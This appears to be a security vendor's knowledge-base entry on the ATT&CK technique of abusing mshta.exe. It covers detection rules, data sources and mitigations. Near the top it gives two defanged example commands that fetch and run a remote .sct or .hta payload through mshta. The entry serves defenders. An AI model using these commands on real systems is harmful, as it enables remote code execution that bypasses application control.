T1218.005: Mshta

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.

Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.

Positive Technologies products that cover the technique

MaxPatrol SIEM knowledge base

mitre_attck_execution: PT-CR-1089: DotNetToJScript_Usage: Possible usage of the DotNetToJscript utility is detected mitre_attck_defense_evasion: PT-CR-204: MSHTA_AWL_Bypass: An attempt to bypass application-start restrictions by using mshta.exe (a built-in Microsoft Windows utility that executes HTML applications (.hta)) mitre_attck_defense_evasion: PT-CR-650: Suspicious_File_Created_By_Legal_Process: Detects creation of suspicious files by legitimate processes hacking_tools: PT-CR-353: Koadic_MSHTA_Stager: Possible use of Koadic software (Koadic framework is designed for post-exploitation in Windows family operating systems) that runs a payload on the attacked host using Microsoft Windows HTML Application was detected

Detection

IDDS0009Data source and componentProcess: Process CreationDescription

Use process monitoring to monitor the execution and arguments of mshta.exe.

IDDS0017Data source and componentCommand: Command ExecutionDescription

Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.

IDDS0029Data source and componentNetwork Traffic: Network Connection CreationDescription

Monitor for newly constructed network connections that are sent or received by untrusted hosts.

IDDS0022Data source and componentFile: File CreationDescription

Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious

Mitigation

IDM1038NameExecution PreventionDescription

Use application control configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries. For example, in Windows 10 and Windows Server 2016 and above, Windows Defender Application Control (WDAC) policy rules may be applied to block the mshta.exe application and to prevent abuse.

IDM1042NameDisable or Remove Feature or ProgramDescription

Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life.